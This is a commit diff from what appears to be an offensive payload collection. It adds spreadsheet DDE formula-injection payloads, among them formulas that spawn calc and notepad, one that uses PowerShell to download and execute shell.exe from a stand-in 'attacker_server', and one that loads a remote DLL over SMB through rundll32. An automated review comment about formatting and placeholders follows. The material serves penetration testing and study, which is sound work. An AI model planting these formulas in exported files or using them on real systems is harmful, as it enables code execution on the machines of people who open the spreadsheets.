PrivEsc - Common Exploits

This commit is contained in:
Swissky
2019-06-09 20:53:41 +02:00
parent e8cd11f88f
commit 5d4f65720a
5 changed files with 66 additions and 2 deletions

@@ -7,10 +7,18 @@ Many web applications allow the user to download content such as templates for i
Basic exploit with Dynamic Data Exchange
```powershell
# pop a calc
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0
# pop a notepad
=cmd|' /C notepad'!'A1'
# powershell download and execute
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
# msf smb delivery with rundll32
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
```
Technical Details of the above payload:
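Review bot: The block under "Basic exploit with Dynamic Data Exchange" is fenced as `powershell`, but every entry in it is a spreadsheet formula (for example `=cmd|' /C notepad'!'A1'`), so syntax highlighters will mis-render it; a plain-text or untagged fence fits better. The entries also mix placeholder styles: `attacker_server` in the download line and a hard-coded `10.0.0.1` in the rundll32 line. Use one documented placeholder for both so readers can tell which values are examples. The commit title is "PrivEsc - Common Exploits", yet this hunk edits the DDE formula section of a different page; either split it into its own commit or mention it in the message so the history stays searchable.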